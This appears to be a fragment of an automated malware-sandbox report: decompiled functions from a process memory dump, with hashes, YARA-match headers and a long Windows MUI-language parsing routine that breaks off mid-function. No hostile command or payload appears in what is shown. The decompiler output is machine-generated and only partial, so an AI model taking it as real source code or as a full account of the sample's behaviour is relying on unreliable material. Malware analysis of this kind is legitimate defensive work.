                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 62f155a2f2b834774e03dd9f5cc664d450e5ddbb18d5cf86998e13752e76a9ec
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 6EE01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0957241CA34E8508BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00418900(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E004191B0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                0x00418903
                                                0x0041891a
                                                0x00418928

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418928
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: 622c55a551f2a3710ca15f35a1068b8193fa72338b31a42c8a230178039be0f3
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 3FD012716002147BD620DB99CC85FD777ACDF48750F058065BA1D5B241C531BA00C6E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0040C3E7, Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c2ae3e5df6120d257ad6511da159de35997602f269a8575f0d57cb1e9a201f8
                                                • Instruction ID: 78dcef61c35556fee7d3ed98e483380662f12c9fd41c46dad2725844ffff7127
                                                • Opcode Fuzzy Hash: 0c2ae3e5df6120d257ad6511da159de35997602f269a8575f0d57cb1e9a201f8
                                                • Instruction Fuzzy Hash: 80C01247E4011A4766210849A9023B9FBA4D242061E707293DC86E3621D102C96656C9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406AC1, Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aad178f0dadc99881a3b1c5f172b438dddd553eb82d6e027f97f42123a3d42ec
                                                • Instruction ID: 196d9a09e6c80b8414233a2ffffa03839937906ee788995ec70e45d92e69caac
                                                • Opcode Fuzzy Hash: aad178f0dadc99881a3b1c5f172b438dddd553eb82d6e027f97f42123a3d42ec
                                                • Instruction Fuzzy Hash: FBB09232E6600402E8202C0CB8402F1E36C8393234D04A3A3EC08B32404086C86100CD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00415671, Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd9f48c0059c41efcdac69e6699bb18d2d1b461c75e951527b6a473dc50af9dc
                                                • Instruction ID: 42c7a0489b2cd7c928858ce538c9340e9bb29dd8d1f1922c1d38832c0a36c846
                                                • Opcode Fuzzy Hash: bd9f48c0059c41efcdac69e6699bb18d2d1b461c75e951527b6a473dc50af9dc
                                                • Instruction Fuzzy Hash: D1B09233A5A0540A86221E08B8101B4F724D287035A0063EBE84863401908284264289
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009110D0, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090F8CC, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00910060, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009101D4, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0091010C, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00911930, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090F938, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00911148, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FAB8, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FA20, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FA50, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FBE8, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FB50, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090FC30, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00938788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00938788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00938460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0091E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0093718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00938460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0093718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00938460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00938460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00938460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0093718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00912340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0092E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0091E2A8(_t322,  &_v68, _v16);
								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0092E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0091E2A8(_t322,  &_v68, _t236);
								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0093718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00912340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0092E679(_v20, _t332);
